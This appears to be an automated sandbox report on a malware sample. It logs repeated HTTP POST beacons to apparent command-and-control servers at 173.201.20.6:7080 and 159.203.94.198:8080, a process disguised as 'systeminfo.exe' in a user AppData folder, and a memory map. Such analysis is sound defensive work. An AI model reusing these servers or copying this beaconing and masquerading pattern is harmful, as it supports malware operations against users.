| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 159.203.94.198 |
| Server Port | 8080 |
| Data Sent | 0.33 KB (335 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 159.203.94.198, server_port = 8080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 159.203.94.198 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
1 |
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) |
| Server Name | 173.201.20.6 |
| Server Port | 7080 |
| Data Sent | 0.32 KB (331 bytes) |
| Data Received | 0.15 KB (156 bytes) |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Open Connection | protocol = HTTP, server_name = 173.201.20.6, server_port = 7080 |
|
1 | |
| Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Send HTTP Request | headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4 |
|
1 | |
| Read Response | size = 148, size_out = 148 |
|
1 | |
| Read Response | size = 0, size_out = 0 |
|
1 | |
| Close Session | - |
|
20 |
| Information | Value |
|---|---|
| ID | #9 |
| File Name | c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe" "C:\ProgramData\FB6F.tmp" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:08, Reason: Child Process |
| Unmonitor | End Time: 00:02:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:15 |
| Information | Value |
|---|---|
| PID | 0x674 |
| Parent PID | 0x81c (c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Groups |
|
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9E4
|
| Name | Start VA | End VA | Type | Permissions | Monitored | Dump | YARA Match | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| imm32.dll | 0x00020000 | 0x0003dfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
|
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
|
| locale.nls | 0x00110000 | 0x00176fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x00418fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000590000 | 0x00590000 | 0x0060ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000780000 | 0x00780000 | 0x0087ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000880000 | 0x00880000 | 0x009fffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000a00000 | 0x00a00000 | 0x00b87fff | Pagefile Backed Memory | Readable |
|
|
|
|
| 3292.exe | 0x00be0000 | 0x00bfefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x0000000000c00000 | 0x00c00000 | 0x00d80fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000d90000 | 0x00d90000 | 0x0218ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| wow64cpu.dll | 0x746e0000 | 0x746e7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x746f0000 | 0x7474bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74750000 | 0x7478efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x74dc0000 | 0x74dcbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x74dd0000 | 0x74e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x74e30000 | 0x74e8ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x74e90000 | 0x74ea8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x750d0000 | 0x75126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x75130000 | 0x751bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75250000 | 0x75295fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x752a0000 | 0x7534bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
